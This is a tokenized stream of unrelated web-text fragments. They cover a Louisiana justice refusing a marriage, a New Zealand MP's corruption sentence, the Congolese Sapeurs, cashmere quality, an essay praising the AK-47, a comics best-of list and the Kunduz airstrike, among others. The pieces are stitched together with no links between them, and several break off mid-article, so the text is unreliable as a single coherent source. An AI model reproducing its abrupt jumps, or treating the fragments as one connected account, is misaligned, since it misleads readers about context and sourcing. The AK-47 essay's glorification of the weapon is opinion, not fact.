" He knew he was breaking the law , but continued to do it , " Schwartzmann said .
Bardwell said : " I 've been a justice of the peace for 34 years and I do n't think I 've mistreated anybody .
I 've made some mistakes , but you have to .
I did n't tell this couple they could n't get married .
I just told them I would n't do it . "
The human population of the world cannot continue to grow without doing great harm to the planet 's ecology .
Much of this harm may be irreversible .
Our efforts to improve our quality of life will , one day , turn on us and be their very own undoing .
But it is not simply a matter of the total number of humans which is , and will continue to be , the cause of our problems .
It is also the distribution of the population , in fact , at present it is more the distribution of the population which is causing problems than the total population .
London has a population of around 7 million , New York , over 8 million and in the emerging nations the figures are worse with Beijing at over 10 million and Mumbai nearly 14 million .
Such concentrations of populations put an intolerable strain on rescourses .
The cost of transporting produce to these city 's , both in terms of hard cash and environmental damage , is putting the entire world at risk .
But nothing will happen to put this situation right , because we are all NIMBY 's , we are all greedy ( some far more so than others ) and we are not prepared to give up anything for anyone .
Originally Posted : 2009-10-13 18:21
Can I flush your head in a toilet while blasting Hall & Oates ? m4w
ART OF EUROPE
Paul Celan - poetry , poems
1920 - 1970
so celan & life 's a bitch and then you 're dead , or otherwise / etc/on /
( and i remember crying to aspen tree when my mother died - otherwise
it 's gorecki 3 )
translations are by Michael Hamburger
Poems by title
Poems by first line
Stuff in bookform
Paul Celan on the web
A representative of the Topps trading card company contacted me to let me know UFC Heavyweight Champion Brock Lesnar showed up to offices in Minnesota to do signings of various products .
Above is one image and there are two more below the fold .
There is n't a ton to glean from these save that Lesar has added some grizzly facial hair , does not appear gaunt ( inasmuch as Lesnar can be ) , is not showing obvious signs of illness and seems to be in pleasant spirits .
I say this not as a denial of Lesnar 's reported condition , but only to hopefully deepen our understanding of present circumstances .
The coat and the seated position Lesnar is in could be masking matters .
I am forced to admit this is n't exactly the most helpful angle to make any kind of evaluation .
Still , it 's worth passing along these photos just the same .
Was established to provide rapid , professional , practical and cost - effective advice and assistance to companies currently affected by export controls or who are considering entering the market place but are unsure of the commercial and regulatory implications .
We have extensive expertise in UK and EU export controls and sanctions ; US export controls under ITAR , EAR as well as the Department of Energy and Nuclear Regulatory Commission and sanctions administered by the Office of Foreign Assets Control ( OFAC ) and the Department of State .
This extensive experience often enables complex or unusual matters to be resolved relatively quickly .
«« First « Previous | Random | Next » Current »»
I guess what I 'm trying to say is ...
HAPPY HOLIDAYS !
«« First « Previous | Random | Next » Current »»
Prime Minister John Key says the Taito Phillip Field saga reflects very badly on Parliament , but is an isolated case .
Field was found guilty in August of 26 charges of bribery , corruption and obstructing the course of justice .
In the High Court at Auckland on Tuesday , Justice Hansen sentenced Field to four years in prison on the 11 corruption and bribery charges and two years on the 15 charges of obstructing the course of justice .
John Key says six years is not an insignificant sentence , and he'd like to think that will help New Zealand 's reputation as not tolerating corruption .
He says the Field case reflects badly on the Labour Party , and it was only because of pressure from National while in opposition that Field was ultimately held to account .
The judge told him that Taito Phillip Field had put his private interests ahead of his public ones by granting immigration favours to eight people in return for free labour on five properties he owned .
Some of Field 's actions , Justice Hansen said , had threatened the foundations of democracy , and he had betrayed the trust of the people he represented .
He had cynically used the adulation Thai nationals felt towards him for his own financial gain .
He had given them an opportunity for a new life , they revered him for it and he used that gratitude .
The judge said Field must have known that the tradesmen 's willing assistance saved him tens of thousands of dollars , but when his public and private roles came into conflict his private interests won .
Little emotion shown at sentencing
When taken from the court Field was holding a bible ; supporters called out to him to be strong , and told him they loved him .
He showed little emotion as the sentence was delivered but had earlier been wiping his eyes .
Last Friday , he publicly apologised for the circumstances leading to the trial , but denied any wrongdoing , saying that the truth was still to be exposed .
At one stage the sentencing hearing was interrupted when a man told the court the case was an act of treason .
He was taken away by the police .
Defence lawyer Paul Davison said he thought the sentence was tough and longer than he submitted was appropriate .
He said he had hoped for a sentence in the vicinity of four and a half years .
Mr Davison has n't ruled out an appeal .
Reaction to sentence
As his punishment was handed down many of his supporters started sobbing .
Outside court his wife Maxine Field said she was disappointed with the sentence but accepted the law was the law .
She says she is heartbroken he will spend the next six years behind bars .
She tearfully maintained her husband never intended to do anything wrong and had a ' clean heart ' .
The Speaker of the House , Lockwood Smith , has expressed sadness that Field has been sent to prison but says it shows that all MPs are accountable for their actions and that no one is above the law .
While Opposition spokesperson on immigration , Dr Smith pursued Field 's handling of the immigration cases at the heart of the corruption convictions .
The Labour Party also says that the sentence shows that all New Zealanders are equal under the law .
Field has been judged by his peers , says deputy leader Annette King , and must now serve the sentence handed down .
Case ' exhausting and difficult '
Crown prosecutor Simon Moore has described the case as " extraordinarily exhausting and difficult " .
He said the case had unique aspects which made it one of the more challenging sentencing decisions to confront a judge .
Mr Moore says those aspects included the fact it was the first time a member of parliament had been prosecuted in New Zealand for bribery and corruption .
Another was the position Field held and the fall from grace from someone who had served the community well .
James Owen Sullivan , the drummer for the band Avenged Sevenfold , died today , according to a statement on the band 's official website .
Sullivan , 28 , also performed as a backup vocalist for the band , which formed in Huntington Beach in 1999 .
" It is with great sadness and heavy hearts that we tell you of the passing today of Jimmy ' The Rev' Sullivan , " read a statement on the group 's website late tonight .
" Jimmy was not only one of the world 's best drummers , but more importantly he was our best friend and brother .
Our thoughts and prayers go out to Jimmy 's family and we hope that you will respect their privacy during this difficult time .
Jimmy you are forever in our hearts .
We love you . "
The group won Best New Artist at the MTV Video Music Awards in 2006 .
-- Monte Morin
Editor 's note : Journalist Gail Collins , the first woman to edit The New York Times editorial page , is the author of " When Everything Changed : The Amazing Journey of American Women from 1960 to the Present . "
She wrote this piece , a letter to the next generation of women , exclusively for CNN .
( CNN ) -- Dear Young American Women ,
It 's possible that you have been told a time or 10 that you do n't appreciate how tough your elders had it .
It 's true that , if you had been coming of age back in , say , 1960 , you would probably be feeling more restricted , if only because you were doomed to spend your days in a skirt , nylon stockings and girdle .
( Everybody wore a girdle back then , even Barbie , the individual least in need of a foundation garment in American history . )
Back then , if you wanted a career that involved travel , you 'd have to have become a flight attendant .
Although good luck with that -- there were 100 applicants for every opening .
People paid to go to special schools to learn how to improve their chances of being chosen for that very job that involved appallingly low pay and allowed you to be fired if you gained weight or got married .
Fifty years ago , women could n't get a credit card or apartment lease unless their father or husband co-signed .
And it was perfectly legal for an employer to say that he did n't hire women .
( Madeleine Kunin , the future governor of Vermont , applied for an editing job at my own beloved New York Times and was asked if she 'd like to consider waitressing in the corporate dining room . )
You may be thinking right now that this actually does n't sound so bad , that it would be more fun to take to the streets protesting job discrimination than worrying about living in the streets because there are n't any jobs around at all .
Point well taken .
You 've got your own problems and truly , you are not required to bow down to the generation that gave you equal opportunity to play high school sports .
( Now even Sarah Palin loves Title 9 .
But when it first became law , men were sure it would mean the end of football and everything they held dear .
Rep .
Pat Schroeder of Colorado was touring a local high school shortly after it passed , and the boys ' basketball coach said " Show the congresswoman what you think of Title 9 . "
The team turned around and mooned her . )
There are plenty of challenges that still remain and you know about them better than me .
If you 're planning on knocking them dead in business or one of the professions , you may discover , to your shock , that there 's still discrimination out there .
If you 're thinking about a military career , there 's never been a better time for a woman , but the problem of sexual harassment in the field is disturbingly real .
No matter what you 're doing , you 're probably going to wind up worrying about how to balance work and family .
Violence against women has n't gone away ; it actually seems to be getting worse .
And if you 're prepared to worry about things on an international sphere , the oppression of women in other parts of the world is a cancer that has to be cured if the planet is going to evolve in the right direction .
What with all that , it looks like there 's plenty on your plate .
And if you do n't feel like dwelling on the non-problems , if you automatically assume that a woman has as much right to have a terrific career and exciting adventures as any guy , that 's great .
For the entire history of recorded civilization , people had ideas about women 's limitations , and their proper ( domestic ) place in the world .
That all changed in my lifetime -- came crumbling down .
The fact that I got to see it , in the tiny sliver of history I inhabit , just knocks me out .
You taking it for granted knocks me out .
But if you do want to take a look back now and then , and contemplate how America evolved into a country where women could finally claim their rights , you might enjoy the ride even more .
It 's a great story , and it was all leading up to you .
OSLO -- President Barack Obama accepted the Nobel Peace Prize Thursday with an embrace of armed might in the service of a " just war , " a sharp change in emphasis from his past rhetoric criticizing the foreign policy of the Bush years .
The address set a new tone for his young administration , which been accused by foreign - policy hawks of being too accommodating to overseas powers and too quick to seek favor abroad .
Mr ....
The Sapeurs adhere to a subculture of high fashion , often against a backdrop of extreme poverty .
Many live in shacks bordered by stinking sewers in the southern suburbs of Brazzaville .
Those of them who can work double jobs ; those who ca n’t must beg , borrow and occasionally steal ; whatever it takes to strut in Versace , Prada and Gucci .
Meet the Sapeurs of Congo .
In a country where many survive on 30 cents a day , Papy Mosengo is flashing $ 1,000 worth of designer clothing on his back , Dolce Gabbana cap and Versace stretch shirt to his spotless white Gucci loafers .
“ It makes me feel so good to dress this way , ” the 30 - year - old said when asked about such conspicuous consumption in a city beset by unemployment , crime and homelessness .
“ It makes me feel special . ”
But Mosengo can scarcely afford this passion for fashion .
He worked eight months at his part - time job at a money - exchange shop to earn enough for the single outfit , one of 30 he owns , so he ’ll never have to wear the same one twice in a month .
He does n’t own a car .
He lets an ex-girlfriend support their 5 - year - old son and still lives with his parents , sleeping in a dingy , blue - walled bedroom that is more aptly described as a closet with a mattress .
The word “ Sapeur ” is derived from SAPE , an acronym for the movement itself , Société des Ambianceurs et Persons Élégants .
The word sape , perhaps not accidentally , also means “ to dress with elegance and style ” in French .
The roots of the movement can be traced back to 1920s and 30s when the first privileged Congolese who had spent time in France returned with wardrobes of dapper suits .
However , it was n’t until the 1960s and 70s that the cult of style really took off , thanks to musician and singer Papa Wemba .
Multiple trips to Paris in the early 1980s only fueled his fever for French fashion , and Papa Wemba soon developed a flamboyant , exaggerated style that was in direct opposition to the Mobutu - approved uniform , the dreaded abacost ( from the French “ à bas le costume , ” or “ down with the suit ” ) , a dull Zairean version of the three - piece suit .
He called his new style Ungaru , and it was a throwback to the elegance of the 1930s — complete with tapered trousers , brogues , neatly trimmed hair and tweed hats worn at a rakish angle .
For Congolese all over the world , the look was irresistible .
SAPE was born .
Héctor Mediavilla Sabaté has been studying and photographing Sapeurs since 2003 .
A Sapeur , by definition is a non-violent person , despite the 3 civil wars that have taken place since the independence .
They stand for an exquisite morality , but as they say “ There can only be Sape when there is peace ” .
They represent an illusion that has been supported by the government itself , trying to normalize a post - war situation .
The SAPE interrupted its activities when the civil war started in 1997 , and did not reinitiate its activities until 2002 .
Their motto became “ Let ’s drop the weapons , let us work and dress elegantly . ”
Old school Sapeurs often spent years saving up for outfits .
They started out by renting or borrowing suits from their more established peers .
However , many of the new generation do n’t like to wait that long , and they ’re not so fussy either when it comes to sources of income to fund their passion , as Edmund Sandars reports :
Indeed the great Papa Wemba himself needed more than concert fees and album royalties to pay for his stylish gear …
It is obvious that there is an inconsistency between the way they live and the way they dress . ”
Even wealthy Papa Wemba had to resort to tricks to keep himself in Cavalli — soliciting money for working the names of fellow sapeurs into his songs and , recently , charging upwards of US $ 4,000 for smuggling Congolese men and women into Europe disguised as members of his band , which led to his arrest in France in 2003 ( whereupon there were riots in Kinshasa )
Within the SAPE movement there are rivalries and affiliations .
Paris vs Brussels , Brazzaville vs Kinshasa , Bacongo vs Mungali .
It is total fashion warfare .
The rules of engagement also differ from gang to gang .
The Brazzaville Sapeurs tend to follow the three colours only rule .
Meanwhile in Kinshasa it ’s all about going overboard .
Sapeurs do n’t dress up all the time either .
“ Fight days ” are limited to once every week or so , and the combat arenas are the local outdoor bars on Avenue Matsoua .
Ironically Papa Wemba converted to Christianity whilst serving his prison sentence .
He is no longer an advocate for 5,000 dollar suits .
A number of his contemporaries now also express sadness at having spent so much money on SAPE .
King Kester Emeneya lamented , “ I really regret it .
We set a bad example .
If I had invested my money instead , I would own several houses .
It was like a drug . ”
However , judging by the amount of Paul Smith suits on display at club La Main Bleue on Sunday nights , the younger devotees have no intention of turning their backs on the “ cult of the cloth ” .
Photo credit : Colors Magazine
How can pure cashmere sweaters cost £ 500 on Bond Street but less than £ 50 at Marks & Spencer ?
The short answer is China .
The long answer is that a label saying “ 100 % cashmere ” tells only 50 % of the story .
Cashmere is the downy undercoat grown by goats in extreme cold .
The great majority of the world ’s cashmere comes from Inner Mongolia ( an autonomous region of China ) and Mongolia ( aka Outer Mongolia ) , where 40 m goats contend with temperatures below - 30 °C .
In the spring , as they start to moult , the goats are combed to remove their fine underhair while leaving the outercoat ( guard hair ) intact .
The combings are then washed and “ dehaired ” of any stray guard hair , so that what is left is pure cashmere .
Pure is not an absolute term .
The finest cashmere consists only of the whitest , longest , thinnest hair from the underfleece , whereas lower - quality cashmere may be either the shorter , coarser hair from the undercoat–typically from the rear end of the animal rather than its belly–or , more dubiously , shorter hair that has either not been properly dehaired or , worse still , blended with yak or rabbit hair .
When the best white ( dehaired ) cashmere costs $ 75 per kilo and one sweater requires at least 200g of fibre , the motive for mass - producers to use cheaper stuff becomes clear .
Cheap cashmere is a 21st - century phenomenon .
As recently as the 1990s , China and Mongolia were exporting more raw material than finished garments .
The cream of the crop went to Scotland and Italy to be spun , dyed and knitted .
The costs and expertise involved made it a luxury product , though styles were mostly plain and came in colours–navy blue , bottle green–as staid as the plaid they were meant to be worn with .
Two things shook cashmere out of its heritage niche .
In the mid-1990s young designers such as Clements Ribeiro put creative cashmere on the catwalk , while stalwarts like Pringle and Ballantyne broadened their ranges beyond the Argyle pattern that had made them famous in the era of Edward and Mrs Simpson .
More significantly , China began to manufacture cashmere in vast volumes ; when European Union import quotas were relaxed in 2005 , cashmere poured onto British high streets at unheard - of prices .
Today Asda sells men’s “ pure cashmere ” V - necks for £ 17.50 .
M&S ’s basics now cost £ 49.50 .
How do they do it ?
By mass production –M&S cashmere is made by the Chinese cashmere giant King Deer , which can process 400,000 units at a time–and by cutting corners .
The fibre has a hair length of 28 - 30 mm ( premium is 36 mm - plus ) and it is knitted lightly .
So the customer gets inferior material , and less of it .
Yet even cheap cashmere can feel lovely .
It ’s hard to know , as you queue at the till , whether your bargain will pill or sag within days .
( Pilling afflicts expensive cashmere too , though it should stop after the first wash . )
But there are subtle signs of quality , and once you ’ve got your eye in , much of the cheaper cashmere on the market starts to seem a false economy .
Look for tension in the knitting : stretch a section and it should ping back into shape .
Hold it up to the light and you should n’t see much sky : paradoxically , the best cashmere , though made from the finest hair , has a density to it .
Examine its surface : fluffiness suggests the yarn was spun from shorter , weaker fibres and will pill .
Be sceptical about softness , too .
Over - milling can make a garment too soft and silky , and therefore prone to bobbling and losing its shape .
More expensive cashmere may be harder to handle in the shop , but will ease up with wear and hand - washing .
The best cashmere actually improves with age–so long as the moths do n’t get to it .
Another pointer to authenticity is candour .
Pure Collection reveals the specification of its cashmere on its website : “ Inner Mongolian White for White , 36 - 38 mm , maximum 15.5 micron ” .
That ’s just about the whitest , longest , thinnest goat hair available .
Brora says it uses only the “ longer fibres ” .
At the luxury end , Brunello Cucinelli makes the startling claim that “ only the fur in a very limited area of the animal ’s throat is used ” , while Loro Piana ’s “ baby cashmere ” is made of kid-hair with a diameter of just 13 - 13.5 micron .
M&S failed to respond to my questions about the provenance of its cashmere .
Brora and Pure Collection ( whose founders own N Peal ) score on sustainability , too .
Cashmere is a renewable –it grows every winter — but the goats are not exactly eco-warriors .
The trouble is they do n’t nibble grass , but yank it up by the root .
With no vegetation to pin it down , the topsoil blows away , grasslands turn to desert and duststorms choke Beijing .
For cashmere to be sustainable , the goats must be farmed in enclosures and given extra feed so they do n’t nuke the grass .
The recession has driven down prices in Europe , but it is hard to see them staying so low .
Meanwhile , mid-priced cashmere looks good value .
Pure Collection has basics from £ 89 .
Brora costs more ( from £ 169 for a V - neck ) because it is made in Scotland , and Scottish cashmere has long been considered the best — but Chinese knitting machines can now deliver on sophistication as well as price .
Consequently , Pure Collection and N Peal run a vertical operation in Inner Mongolia where quality can be controlled “ from goat to garment ” .
If money were no object , and greed no sin , I ’d stack my shelves with Brunello Cucinelli , not so much for the throat of the goat but the perfection of the knitting .
And if money were tight , I ’d settle for Uniqlo , where a well - cut crewneck costs £ 59.99 and seems promisingly unfluffy to touch .
What I ’d find hard to contemplate is wearing anything else .
Cashmere is so soft , light and warm that it makes even merino , the king of lambswool , feel a bit like a school jumper .
Race discrimination at work is ugly , it is wrong and it is illegal .
Despite its illegality , we still encounter race discrimination cases where race is without a doubt a factor in other workplace violations .
It does n't matter if you are African American , Asian , Latino , Mid-Eastern , East Indian or even Caucasian — racial discrimination in the workplace happens .
the Navarette Law Firm Will Fight For You
With extensive experience and an exclusive focus on employment law , our lawyers know the pretexts used by employers who try to get away with racial discrimination in the workplace .
We also have a thorough understanding of the race discrimination laws that apply to these cases .
Knowing these pretexts , we will use California law and very successful legal strategies to prepare the best possible case for you .
We Also Represent Racial Minorities In Class - Action Lawsuits
Our attorneys also handle class - action cases based on race such as :
Wrongful termination because of race
Unfair hiring or promotion practices because of race
Unfair job assignments , such as undesirable hours or locations , because of race
Unequal access to training or promotion opportunities because of race
Unfair treatment in matters relating to disability , workers ' compensation or pregnancy leave because of race
Religious discrimination against racial minorities
Contact A San Jose Discrimination Attorney With Over 20 years Of Experience
Every case is different , just like every person is different .
We look forward to learning the unique facts in your case and providing you with representation focused on making things right .
Call 866-994-BEST
( 2378 ) or contact us via email to schedule a consultation .
Please note that there is a fee for the initial consultation , but if we accept your case and we do not recover monetary compensation for you , there is no attorneys ' fee owed beyond the initial consultation fee .
For some of you , probably 75 percent of your social interaction happens via Facebook .
You know who you are .
But from intrusive " pokes " to Farmville invites to photos that should have been destroyed the moment they were taken , Facebook is full of behavior that would get you punched in the real world .
So we asked you to Photoshop for us what real life would be like if it resembled Facebook .
The winner is below , but first the runners up ...
Advertisement
18 Entry by rainoftoads
My work is my life , and my life is my work .
I invented this assault rifle to defend my country .
Today , I am proud that it has become for many synonymous with liberty .
~ Mikhail Kalashnikov
Recently Mikhail Kalashnikov , the man who designed the AK - 47 ( Avtomat Kalashnikova model 1947 ) assault rifle , celebrated his 90th birthday .
Though already feted in his Russian homeland as an officially approved hero at three previous events , President Dmitry Medvedev christened him yet again to honor the occasion , this time as a " Hero of the Russian Federation . "
That was on November 10 , 2009 and America for the most part completely ignored the festivities , as Call of Duty : Modern Warfare 2 was released the same day .
Call of Duty : Modern W... Best Price : $ 2.13 Buy New $ 28.75 ( as of 08:30 EST - Details ) Jackie Brown ( Two - Disc ... Best Price : $ 1.02 Buy New $ 0.12 ( as of 03:10 EST - Details )
While the US industrial - military complex may get to play with an annual budget which exceeds the rest of the globe combined , they have yet to create a weapon even near the genius of the AK - 47 .
It is so reliable that you can literally drop it in the mud , step on it , pick it up , and fire at will .
( Try that with an M - 16 . )
Drop it into a river , fish it off the bottom , and she ’ll fire just fine .
US and British special forces fighting in the inhospitable badlands of Central Asia are big fans .
Combine this amazing reliability with its incredibly cheap production costs and you have the Honda of assault rifles ; more of the AK - 47 variants have been produced than every other assault rifle combined .
Noting studies that found most rifle combat takes place within close proximity , the rifle has a maximum range of about 300 meters , or 3 1/3 football fields , yet when it comes to being able to hit anything 100 yards is more like it .
Since the overwhelming majority of humans are poor shots , semiautomatic or automatic variants are available for your consideration .
Six hundred rounds a minute can be placed onto target , but you ’d need to be a ridiculously fast loader to reach that number as the curved magazine holds only 30 rounds .
100 to 400 rounds a minute is more realistic , and still plenty .
Some versions come with a wooden stock , some with a metal stock which may be folded down for storage ; the latter variant is used by mechanized and airborne troops .
Firing a 7.62 mm round that can either shred you ( if it tumbles when it strikes your body ) or leave a nice clean hole ( if it passes right through ) that can be patched up in a jiffy , the selective fire , gas - operated rifle is so cheap to mass produce and maintain that over 50 armies the world over use it as their chief infantry weapon .
Since this leaves a lot of these things laying about , with plenty of ammunition to boot , it ’s the preferred weapon of choice for terrorists , Mafia , drug dealers , assorted dictators , and other unsavory types .
This fact gives it a rather negative reputation in American eyes ; any Hollywood production with a villain almost invariably arms him with an AK - 47 , never with the M - 16 , our military ’s preferred rifle .
If you like this site , please help keep it going and growing .
Nonetheless , it is a supremely lethal weapon , giving any slob armed with one the combat ability to take on a professional , and after you throw in its ability to function reliably in any type of climate the Earth can offer it ’s easy to understand Samuel L. Jackson ’s character from Jackie Brown when he intones , " The AK - 47 .
When you absolutely , positively got to kill every mother ****** in the room , accept no substitutes . "
Not too many people do .
And that includes not just Iraqi and Afghani rebels but American civilians , too , the last served by AK - 47 — spewing factories from sea to shining sea .
And here is where you should give the communists their just due , as it was communism that put the working masses on an equal footing to the political class in the event things devolve into a bar brawl .
Who says that God has no sense of humor , if a rather dark one , when He gives for us the ironic fact that of all the forms of political organization that humans herd themselves into there has been none more reactionary , bloodthirsty , or political than Stalinism , and that ’s the one which gave us the cheap to produce , lethal , and amazingly low maintenance AK - 47 .
Besides corpses and vodka , the AK - 47 was the only thing communist Russia was ever able to mass - produce .
A guerilla army in today ’s world needs little more than an ample supply of AK - 47s , something to believe in , and the support of those around them to be unconquerable .
That ’s all .
And Mikhail Kalashnikov ,
God bless him , has put that ability in the hands of people from one end of the earth to the other .
Alexander Hamilton wrote in The Federalist No. 29 that should the federal government ever turn despotic it " can never be formidable to the liberties of the people while there is a large body of citizens , little , if at all , inferior to them in discipline and the use of arms . "
If every American family had an AK - 47 hanging on the wall over the 46 " wide - screen plasma , that ’d force enough to give any army pause .
So next May Day , assuming you remember it at all , take a moment to honor the memory of the millions slaughtered over the lethally stupid idea of communism , but give a nod to God ’s great mercy , to His mysterious way that willed that very same idea to birth the AK - 47 .
It gave to the working masses the ability to defend themselves from the more virulent strain of politicians ; it is the sword of the common man .
Of all the firearms yet dreamed up by mankind , it is the automatic for the people .
The Best of C.J. Maloney
DETROIT -- Sarah Thomas made history at the Little Caesars Bowl on Saturday , becoming the first woman to officiate a bowl game when she worked the matchup between Ohio and Marshall .
Sarah Thomas worked as a line judge in the Little Caesar Bowl .
Andrew Weber / US Presswire
Thomas is one of five women officiating in major college football , but Little Caesars Bowl spokesman Tim Moore said she was the first to draw an assignment for a Bowl Subdivision postseason game .
" It was an honor , " Thomas said while running off the field with her colleagues after Marshall 's 21 - 17 victory at Ford Field .
Thomas ' position as line judge meant that she spent most of the game in front of the Thundering Herd 's bench , but the Marshall players did n't pay much attention .
" I noticed her before the game , but that was it , " said Marshall running back Martin Ward , the game 's MVP .
" Once the game started , she was just doing the job that the line judge does in every game we play .
It did n't matter that she was a woman at all . "
Thomas became the first woman to be an official for a major college football game in 2007 and is on the NFL 's list of officiating prospects .
The married mother of two young sons is from Brandon , Miss. , and is a pharmaceutical representative .
" She did a good job , " Marshall coach Rick Minter said .
" I did n't know she was the first woman to work a bowl game , so what an honor to say I was on the same sideline as she was .
And , it 's kind of neat that Pam Ward was doing this game on TV for ESPN . "
Terri Valenti is believed to be the first woman to officiate a professional game .
She was the head linesman earlier this year in a United Football League game .
As the movie industry cannibalizes superheroes one intellectual property at a time , it ’s oftentimes easy to forget that comic books are an entire medium , not a single genre .
Although Paste loves the symbolism of a grand guignol throwdown between two adrenalized supermen , this decade has been especially prolific in tearing down stagnant conventions , in superhero books and beyond .
So if you think you ’re too sophisticated to enjoy a splash page or two , check out our Best .
List .
Ever. of the coolest graphic novels of the past decade , and make sure to tell us yours in the comments .
20 . Captain America Omnibus , Vol. 1
Writer : Ed Brubaker
Artists : Steve Epting , Mike Perkins , Michael Lark , Marcos Martin , Lee Weeks
Publisher : Marvel Comics
Long - time comics scribe Ed Brubaker revitalizes Captain America with action , espionage and precise characterization fitting a superhero veteran of Cap ’s status .
The wonderfully gritty art style of Steve Epting adds exponentially to the retelling of Captain America ’s days as a soldier in WWII , and the return of his first partner , Bucky , is a work of narrative wonder .
Ultimately , the history of a ‘ 40s icon is updated while preserving his adulated past .
19 . Wildcats Version 3.0 : Brand Building
Writer : Joe Casey
Artist : Dustin Nguyen
Publisher : Wildstorm
The design is the first thing you ’ll notice about Wildcats 3.0 , the title streamlined into a clean , antiseptic sans - serif typeface that would n’t look out of place on an investment magazine .
Gone is the messy , hyperkinetic bleed of color and action that tends to accompany most illustrations of grown men in tights fighting .
It looks grown up .
And that ’s exactly what Wildcats 3.0 is : a superhero book for adults .
Writer Joe Casey took a group of X - Men knockoffs and put them in a corporate setting , showing that ethical business can be its own superpower , especially in this day and age .
Critically adored yet commercially stagnant , Casey and penciller Dustin Nyguyen ’s landmark series has yet to be fully collected .
18 . Ex Machina , Vol. 1
Writer : Brian K. Vaughn
Artist : Tony Harris
Publisher : Wildstorm
What makes Ex Machina so phenomenal ?
Where to begin :
Is it the flesh and blood characterization ?
The haunting detail of Manhattan and its elusive quirks ?
Or is it Tony Harris ’ art that makes your eyes glide over every shaded curve like a heated knife on brie ?
It ’s all of these things and more .
And by “ more , ” we mean “ uber- charasmatic Mayor Mitchell Hundred , ” a 9 - 11 hero infused with alien technology who makes local politics more interesting than they have any right to be .
17 . Usagi Yojimbo Volume 18 : Travels with Jotaro
Writer / Artist : Stan Sakai
Publisher : Dark Horse
Stan Sakai ’s elegant , simple line work offers a glimpse into the fetching story of Usagi , a rabbit samurai , and his gradual bonding with a son who does n’t know him .
There ’s plenty of samurai action , adventure and comedy as they travel a fuedal Japan populated talking animals .
One of the longest running series in comics , the quality of the narrative still remains undeniably high .
16 . The Ultimates Omnibus
Writer : Mark Millar
Artist : Bryan Hitch , Steve Dillon
Publisher : Marvel Comics
This one speaks for itself : Captain America , exhausted and bloody , crouches subdued at the feet of a Nazi alien .
The galactic Gestapo asks the First Avenger if he would like to surrender .
Filling a full - page spread , the Captain points to his forehead and screams , “ YOU THINK THIS LETTER ON MY HEAD STANDS FOR FRANCE ? ”
The WWII hero slams his shield edge - wise into the invader ’s head .
High - fives are had .
Halted breath is exhaled .
Awesomeness fills the air .
( Note : It ’s worth noting that the writer of this book is actually European .
And wickedly funny . )
15 . Hellboy Library Edition , Vol. 1 : Seed of Destruction and Wake the Devil
Writers : Mike Mignola , John Byrne
Artist : Mike Mignola
Publisher : Dark Horse
Long before Guillermo del Toro dressed Ron Perlman up in horns and a trench coat , the director was a massive fan of writer / artist Mike Mignola ’s source material , a neo -gothic comic with style to spare .
Mignola uses his titular hero as a tool to explore forgotten folklore and legend , bringing an antique aesthetic to his beautifully rendered , angular pencils .
Infusing pulpy twists ( and zombie robots ) into a melancholic backdrop , Hellboy is bizarre and beautiful .
14 . Superman : Red Son
Writer : Mark Millar
Artist : Dave Johnson
Publisher : DC Comics
In Superman : Red Son , writer Mark Millar bends the comics template of dualistic morality and shows a world in which heroics are defined by politics and environment .
In other words , he constructs a fictional world with the rules of our own .
The plot portrays a Superman who lands in Soviet Russia instead of America , and is raised by the government to preserve the communist manifesto against the encroaching capitalist threat of the west .
By the time you ’re exposed to an Ayn Rand / Lex Luthor hybrid and a paranoia - spouting Batman , you ’ll already be rooting for the comrades in this wildly innovative alternate reality .
13 . The Absolute Authority Vol. 1
Writer : Warren Ellis
Artist : Bryan Hitch
Publisher : Wildstorm
The Authority takes the conventional superhero group comic and fires it out of a ballistics cannon .
With amazing art , fascinating characters and outrageous action , this book throws you head - first into its adrenal - draining , widescreen madness .
A completely satisfying example of what the genre can and should be .
Not intended for the the squeamish .
12 . Pedro and Me : Friendship , Loss and What I Learned
Writer / Artist : Judd Winick
Publisher : Henry Holt and Co .
Possibly the only good thing to come out of MTV ’s vacuous Real World series , former roommate Judd Winick tells the story of his life before and after his stint on the show with Pedro Zamora , his HIV - positive roommate .
Winick does n’t pull any punches , boldly wearing his heart on his sleeve as he escorts the audience through his turbulent emotions .
Afterwards , you ca n’t help but feel you know Pedro too , and appreciate the larger issues he ’s come to represent .
11 . Fables Deluxe Edition , Vol. 1
Writer : Bill Willingham
Artists : Mark Buckingham , Lan Medina
Publisher : Vertigo
If you ’ve ever wanted to see Cinderella as a seductive spy or The Big Bad Wolf as a gritty badass , look no further .
Bill Willingham ’s massive narrative ( we ’re on issue # 90 for those counting ) carries the public - domain populace of The Brothers Grimm and Hans Christian Anderson past its Old World trappings into a modern , inclusive world .
The only thing more magical than the plot twists and characterization is James Jean ’s gorgeous cover art .
Kunduz :
Is the German army empowered to carry out targeted killings ?
By Peter Schwarz Rahmatullah , 19 , a victim of Friday ' NATO air strike , tries to sit up on his bed in a hospital in Kabul , Afghanistan , Saturday , Sept. 5 , 2009 .
WSWS , December 17 , 2009
Over the course of the past few weeks , the German government as well as opposition parties have systematically deceived the German population over the real background to the September 4 airstrike near the Afghan city of Kunduz , which killed up to 142 persons .
It has now been established that German army colonel Georg Klein gave the order for the strike with the deliberate intention of killing the large number of people in the vicinity of two hijacked tankers bogged down in a sandbank .
The government was aware of this fact from the outset , and the parliamentary opposition parties had been informed by November 3 at the latest .
Nevertheless , all of these parties claimed up until last weekend that the bombing was aimed exclusively at the tankers and that the many victims were merely inadvertent " collateral damage . "
On the night of the airstrike , Colonel Klein had written a report which states unequivocally : " On September 4 at 01.51 I decided to destroy with the use of airstrikes two tanker trucks hijacked on the evening of September 3 as well as the INS surrounding the vehicles . "
INS is military shorthand for insurgents .
Later in his report , Klein is even more explicit and states that he had ordered the bombardment in order to " hit enemies of reconstruction . "
This report lay on the desk of the defence minister at the time , Franz Josef Jung ( Christian Democratic Union ) , just one day later .
Nevertheless , Jung repeatedly maintained that the bombing had targeted the two stranded tankers to prevent a possible suicide attack on German field camps situated seven kilometres away .
For a long time , Jung stubbornly denied that the attack has resulted in civilian casualties , although a number of reports by journalists , local authorities and the US military demonstrated that this had been the case .
In a government statement given just a few days later , German Chancellor Angela Merkel addressed the airstrike at Kunduz and with unusual sharpness repudiated any criticism of the attack by domestic or foreign authorities .
Then on October 28 , NATO presented its own official report signed by General Stanley McChrystal , commander of ISAF ( International Security Assistance Force ) .
This report also made absolutely clear that the people assembled around the trucks were the target , not the tankers themselves .
According to the NATO report , Colonel Klein received information shortly after midnight that about 80 Taliban rebels and " several well - known Taliban leaders " were assembled in the vicinity of the tankers .
He then gave his order for the attack .
